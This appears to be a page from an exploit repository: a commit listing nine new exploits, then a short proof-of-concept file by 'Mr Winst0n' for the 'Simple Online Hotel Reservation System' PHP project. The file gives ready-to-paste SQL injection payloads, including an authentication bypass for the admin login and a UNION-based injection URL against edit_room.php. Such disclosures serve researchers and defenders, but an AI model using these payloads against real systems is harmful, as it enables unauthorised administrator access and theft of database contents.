31edb35a91
9 changes to exploits/shellcodes FTP Server 1.32 - Denial of Service WebKitGTK 2.23.90 / WebKitGTK+ 2.22.6 - Denial of Service TransMac 12.3 - Denial of Service (PoC) Simple Online Hotel Reservation System - SQL Injection Simple Online Hotel Reservation System - Cross-Site Request Forgery (Add Admin) Simple Online Hotel Reservation System - Cross-Site Request Forgery (Delete Admin) Joomla! Component J2Store < 3.3.7 - SQL Injection Usermin 1.750 - Remote Command Execution (Metasploit) Feng Office 3.7.0.5 - Remote Command Execution (Metasploit)
20 lines
No EOL
799 B
Text
20 lines
No EOL
799 B
Text
# Exploit Title: Simple Online Hotel Reservation System - SQL Injection / Authentication Bypass
|
|
# Exploit Author: Mr Winst0n
|
|
# Author E-mail: manamtabeshekan[@]gmail[.]com
|
|
# Discovery Date: February 25, 2019
|
|
# Vendor Homepage: https://code-projects.org/
|
|
# Software Link : https://code-projects.org/simple-online-hotel-reservation-system-in-php-with-source-code/
|
|
# Tested on: Kali linux, Windows 8.1
|
|
|
|
|
|
# PoC:
|
|
|
|
# Authentication Bypass:
|
|
|
|
# Go to admin login page (http://localhost/[PATH]/admin/index.php), then use below payload as username and password => Username: ' or 1 -- -
|
|
Password: ' or 1 -- -
|
|
|
|
# SQL Injection:
|
|
|
|
# http://localhost/[PATH]/admin/edit_room.php?room_id=4 [SQLi]
|
|
# http://localhost/[PATH]/admin/edit_room.php?room_id=-4%27union%20select%201,2,3,4%20--%20- |